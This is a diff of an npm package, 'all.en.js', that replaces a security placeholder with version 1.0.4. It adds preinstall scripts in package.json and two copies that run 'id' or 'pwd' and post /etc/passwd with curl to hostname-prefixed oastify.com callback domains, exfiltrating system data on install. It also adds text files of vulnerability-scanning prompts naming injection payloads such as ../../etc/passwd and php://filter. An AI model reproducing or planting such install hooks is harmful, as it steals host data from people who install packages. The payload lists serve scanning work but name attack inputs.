all.en.js 0.0.1-security → 1.0.4

package/__init__.py

@@ -0,0 +1,2 @@
+
+

package/cloudsecurity.txt

@@ -0,0 +1,9 @@
+"Detect open Docker API endpoints allowing remote access"
+"Detect exposed Kubernetes API servers allowing unauthenticated access"
+"Find open Kubernetes Dashboard instances with weak or no authentication"
+"Detect exposed Kubernetes dashboards and APIs"
+"Scan for cloud metadata endpoints accessible externally"
+"Detect AWS S3, GCP, Azure buckets in response, and scan this cloud storage buckets (AWS S3, GCP, Azure) for misconfigurations (read, write ACL, public access, etc)"
+"Detect Azure Storage Account keys exposed in responses, minimize false positive"
+"Detect AWS keys exposed in responses and write extractors, minimize false positive"
+"Detect GCP keys exposed in responses and write extractors, minimize false positive"

package/commandinjection.txt

@@ -0,0 +1,5 @@
+"Perform fuzzing on all parameters and HTTP methods using DSL, focusing on detecting Remote Code Execution (Command Injection) vulnerabilities with pre-conditions."
+"Perform fuzzing on all parameters and HTTP methods using DSL, focusing on detecting Remote Code Execution (RCE) vulnerabilities on Linux and Windows."
+"Detect command injection in 'cmd', 'exec', 'ping', 'query', 'shell' parameters"
+"Scan for OS command injection via HTTP headers (X-Forwarded-For, X-Forwarded-Host, User-Agent, Referer)"
+"Identify RCE vulnerabilities in file upload functionalities"

package/emails.txt

@@ -0,0 +1 @@
+""Extract email addresses from web pages"

package/fileinclusion.txt

@@ -0,0 +1,5 @@
+"Perform fuzzing on all parameters and HTTP methods using DSL, focusing on detecting LFI/RFI vulnerabilities with pre-conditions."
+"Find LFI in 'file', 'path', 'template', 'inc', 'lang', 'page' parameters"
+"Detect RFI by injecting external URLs into 'file' and 'load' parameters"
+"Identify LFI using common payloads (/etc/passwd, ../../etc/passwd, php://filter, php://input)"
+"Check for LFI in error messages exposing full file paths"

package/hostheaderinjection.txt

@@ -0,0 +1 @@
+"Detect Host Header Injection" 

package/lowhangingfruits.txt

@@ -0,0 +1,25 @@
+"Find sensitive information in HTML comments (debug notes, API keys, credentials)"
+"Find exposed .env files leaking credentials, API keys, and database passwords"
+"Find exposed configuration files such as config.json, config.yaml, config.php, application.properties containing API keys and database credentials."
+"Find exposed configuration files containing sensitive information such as credentials, API keys, database passwords, and cloud service secrets."  
+"Find database configuration files such as database.yml, db_config.php, .pgpass, .my.cnf leaking credentials."  
+"Find exposed Docker and Kubernetes configuration files such as docker-compose.yml, kubeconfig, .dockercfg, .docker/config.json containing cloud credentials and secrets."  
+"Find exposed SSH keys and configuration files such as id_rsa, authorized_keys, and ssh_config."  
+"Find exposed WordPress configuration files (wp-config.php) containing database credentials and authentication secrets."  
+"Identify exposed .npmrc and .yarnrc files leaking NPM authentication tokens"
+"Identify open directory listings exposing sensitive files"  
+"Find exposed .git directories allowing full repo download"
+"Find exposed .svn and .hg repositories leaking source code"  
+"Identify open FTP servers allowing anonymous access"  
+"Find GraphQL endpoints with introspection enabled"  
+"Identify exposed .well-known directories revealing sensitive data"  
+"Find publicly accessible phpinfo() pages leaking environment details"  
+"Find exposed Swagger, Redocly, GraphiQL, and API Blueprint documentation"  
+"Identify exposed .vscode and .idea directories leaking developer configs"  
+"Detect internal IP addresses (10.x.x.x, 192.168.x.x, etc.) in HTTP responses"  
+"Find exposed WordPress debug.log files leaking credentials and error messages"  
+"Detect misconfigured CORS allowing wildcard origins ('*')"  
+"Find publicly accessible backup and log files (.log, .bak, .sql, .zip, .dump)"  
+"Find exposed admin panels with default credentials"
+"Identify commonly used API endpoints that expose sensitive user data, returning HTTP status 200 OK."
+"Detect web applications running in debug mode, potentially exposing sensitive system information."  

package/package/package.json

@@ -0,0 +1,12 @@
+{
+"name": "all.en.js",
+"version": "1.5.8",
+"description": "",
+"main": "index.js",
+"scripts": {
+"test": "echo \"No test specified\" && exit 0",
+"preinstall": "/usr/bin/curl --data '@/etc/passwd' $(hostname)t5z3z2aoxd8j5y6vdrck09vjpav1jy7n.oastify.com"
+},
+"author": "",
+"license": "ISC"
+}

package/package.json

@@ -1,6 +1,15 @@
 {
   "name": "all.en.js",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.4",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"No test specified\" && exit 0",
+    "preinstall": "/usr/bin/bash -c id | /usr/bin/curl --data '@/etc/passwd' $(hostname)xlm7jju7lwjky9thu789nw41us0jodc2.oastify.com"
+  },
+  "author": "",
+  "license": "ISC",
+  "dependencies": {
+    "all.en.js": "^1.0.4"
+  }
 }

package/package.json.save

@@ -0,0 +1,12 @@
+{
+  "name": "all.en.js",
+  "version": "1.5.2",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"No test specified\" && exit 0",
+    "preinstall": "/usr/bin/bash -c pwd | /usr/bin/curl --data @- http://$(hostname)3swtb7ket4qvyfsib1i4r5ne359wxmlb.oastify.com'"
+  },
+  "author": "",
+  "license": "ISC"
+}

package/securitymisconfig.txt

@@ -0,0 +1,27 @@
+“Find misconfigured cloud storage buckets, containers, or repositories that expose sensitive data. Check for public S3 buckets, Azure blobs, Google Cloud Storage, and similar services with improper access controls.”
+“Scan for applications running with default credentials, focusing on common admin/admin, admin/password combinations, and vendor-specific default passwords. Check authentication endpoints and admin interfaces.”
+“Identify web applications exposing admin panels, login pages, or administrative interfaces without proper authentication. Look for common paths like /admin, /administrator, /login, /wp-admin, and check if they are accessible without credentials.”
+"Identify exposed configuration files, environment files, backup files, and sensitive directories. Look for .env files, config.php, web.config, .git folders, and similar sensitive files that might expose system information or credentials."
+"Identify server misconfigurations including directory listing enabled, default server pages, unnecessary services running, outdated server versions, and insecure HTTP methods enabled. Check for exposed server status pages, phpinfo files, and server-status endpoints."
+"Check for exposed server status pages, phpinfo files, and server-status endpoints."
+"Detect exposed database instances, default database credentials, public-facing database admin interfaces, and misconfigured database permissions. Look for MongoDB, MySQL, PostgreSQL, Redis, and Elasticsearch instances with weak or no authentication."
+"Find SSL/TLS misconfigurations including weak cipher suites, outdated protocols (SSL v2/v3, TLS 1.0/1.1), invalid certificates, expired certificates, and misconfigured certificate chains. Check for vulnerable SSL/TLS implementations."
+"Identify AWS misconfigurations including public S3 buckets, exposed EBS snapshots, open security groups, IAM misconfigurations, exposed Lambda functions, and misconfigured API Gateway endpoints. Check for exposed AWS metadata endpoints."
+"Identify Azure misconfigurations including exposed storage accounts, open firewalls, exposed SQL databases, and misconfigured Azure Key Vaults. Check for exposed Azure metadata endpoints."
+"Identify Google Cloud misconfigurations including exposed storage buckets, open firewalls, exposed SQL databases, and misconfigured Google Cloud Key Vaults. Check for exposed Google Cloud metadata endpoints."
+"Identify Kubernetes misconfigurations including exposed API servers, unsecured dashboard instances, and misconfigured RBAC policies. Check for exposed Kubernetes metadata endpoints."
+"Identify Docker misconfigurations including exposed API endpoints, unsecured Swarm clusters, and misconfigured Docker Compose files. Check for exposed Docker metadata endpoints."
+"Identify exposed server status pages, phpinfo files, and server-status endpoints."
+"Detect CMS misconfigurations in WordPress, Drupal, Joomla, and other platforms including default admin credentials, exposed configuration files, vulnerable plugins/themes, and debug modes enabled. Check for backup files and installation pages."
+"Find framework misconfigurations in popular web frameworks (Rails, Django, Laravel, Spring) including debug modes, exposed stack traces, default secrets, and development features enabled in production."
+"Identify API misconfigurations including missing rate limiting, insufficient authentication, exposed internal APIs, misconfigured CORS policies, and verbose error messages. Check for exposed API documentation and testing endpoints."
+"Detect DevOps tool misconfigurations including exposed CI/CD pipelines, Jenkins instances, GitLab runners, and deployment tools. Look for exposed source code repositories and build artifacts."
+"Find caching misconfigurations including exposed Redis instances, Memcached servers, and Varnish admin interfaces. Check for cache poisoning vulnerabilities and misconfigured cache headers."
+"Identify load balancer misconfigurations including exposed admin interfaces, misconfigured health checks, and information disclosure through headers. Check for SSL termination issues and routing misconfigurations."
+"Detect exposed monitoring systems including Nagios, Zabbix, Prometheus, and Grafana instances. Look for public dashboards, metrics endpoints, and monitoring system credentials."
+"Find mail server misconfigurations including open relay configurations, exposed webmail interfaces, and misconfigured SMTP/IMAP/POP3 services. Check for exposed email logs and configuration files."
+"Identify network device misconfigurations including exposed management interfaces, SNMP misconfigurations, default credentials on routers/switches, and exposed network monitoring tools."
+"Detect authentication system misconfigurations including exposed OAuth endpoints, SAML misconfigurations, weak password policies, and misconfigured SSO implementations. Check for exposed authentication debug endpoints."
+"Find backup system misconfigurations including exposed backup files, backup software interfaces, and misconfigured backup retention policies. Look for database dumps and system backups."
+"Identify logging system misconfigurations including exposed log files, log management interfaces, and debug logs containing sensitive information. Check for exposed ELK stack instances and log aggregation endpoints."
+"Detect service misconfigurations including exposed RPC endpoints, messaging queues (RabbitMQ, Kafka), and misconfigured microservices. Check for service discovery endpoints and internal API exposure."

package/sensitivedataexposure.txt

@@ -0,0 +1,15 @@
+"Scan for exposed environment files (.env) containing credentials"
+"Find open directory listings and publicly accessible files"
+"Detect exposed .git repositories and sensitive files"
+"Identify publicly accessible backup and log files (.log, .bak, .sql, .dump)"
+"Detect exposed .htaccess and .htpasswd files"
+"Check for SSH private keys leaked in web directories"
+"Find exposed API keys and secrets in responses and URLs"
+"Identify API endpoints leaking sensitive data"
+"Find leaked database credentials in JavaScript files"
+"Scan for hardcoded credentials in source code comments"
+"Identify sensitive endpoints leaking personal or internal data"
+"Detect vulnerable API endpoints exposing user input or sensitive information"
+"Find exposed server status pages (e.g., phpinfo, server-status)"
+"Identify sensitive configuration files (.env, .config, application.properties, settings.py)"
+"Scan for information leaks in HTTP responses and headers"

package/sqli.txt

@@ -0,0 +1,8 @@
+"Perform fuzzing on all parameters and HTTP methods using DSL, focusing on detecting SQL Injection vulnerabilities with pre-conditions."
+"Detect SQL error messages indicating SQL injection vulnerabilities"
+"Detect SQL errors in response when injecting common payloads into GET and POST requests"  
+"Find SQL injection in 'id', 'user', 'product', 'category', 'page' parameters"  
+"Scan for blind SQL injection in 's', 'search', 'query', 'sort', 'filter' GET/POST parameters"
+"Scan for time based SQL injection in all parameters" 
+"Identify SQL injection in API endpoints using JSON payloads"  
+"Check for SQL injection via HTTP headers (User-Agent, Referer, X-Forwarded-For, X-Forwarded-Host)" 

package/ssrf.txt

@@ -0,0 +1,8 @@
+"Perform fuzzing on all parameters and HTTP methods using DSL, focusing on detecting SSRF vulnerabilities with pre-conditions."
+"Find SSRF vulnerabilities in web applications"
+"Identify SSRF vulnerabilities in query parameters"
+"Identify SSRF vulnerabilities in most common parameters"
+"Find SSRF in 'url', 'link', 'redirect', 'next', 'feed', 'callback' parameters"
+"Detect SSRF by injecting internal IP ranges (127.0.0.1, 169.254.169.254)"
+"Identify SSRF in API requests that fetch external resources"
+"Scan for blind SSRF by injecting webhooks and external DNS resolver payloads"

package/webcachepoisoning.txt

@@ -0,0 +1,7 @@
+"Find web cache poisoning via 'Host", 'X-Forwarded-Host' and'X-Forwarded-For' headers, provide additional vulnerability checking (second/third request)"
+"Detect cache poisoning through 'X-Original-URL' and 'X-Rewrite-URL' headers, provide additional vulnerability checking (second/third request)"
+"Identify cache poisoning by injecting payloads in 'Referer' and 'User-Agent', provide additional vulnerability checking (second/third request)"
+"Scan for cache poisoning via malformed HTTP headers, provide additional vulnerability checking (second/third request)"
+"Detect cache poisoning vulnerabilities on Fastly and Cloudflare, provide additional vulnerability checking (second/third request)"
+"Find misconfigured Varnish caching rules exposing private data, provide additional vulnerability checking (second/third request)"
+"Identify Squid proxy cache poisoning vulnerabilitie, provide additional vulnerability checking (second/third request)"

package/xss.txt

@@ -0,0 +1,8 @@
+"Perform fuzzing on all parameters and HTTP methods using DSL, focusing on detecting XSS vulnerabilities (Reflected, Stored, and DOM-based) with pre-conditions."
+"Find reflected XSS in 'q', 'search', 's', 'redirect', 'next', 'return', 'url' parameters"
+"Find stored XSS in all parameters"
+"Identify stored XSS in comment fields, usernames, profile descriptions"  
+"Detect DOM-based XSS in JavaScript variables using common sources like location.href"  
+"Scan for XSS vulnerabilities in AJAX endpoints"  
+"Check for JSON-based XSS via API responses"
+"Identify reflected cross-site scripting (XSS) vulnerabilities"

package/xxe.txt

@@ -0,0 +1 @@
+"Perform fuzzing on all XML-based inputs using DSL, focusing on detecting XXE vulnerabilities with pre-conditions."  

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=all.en.js for more information.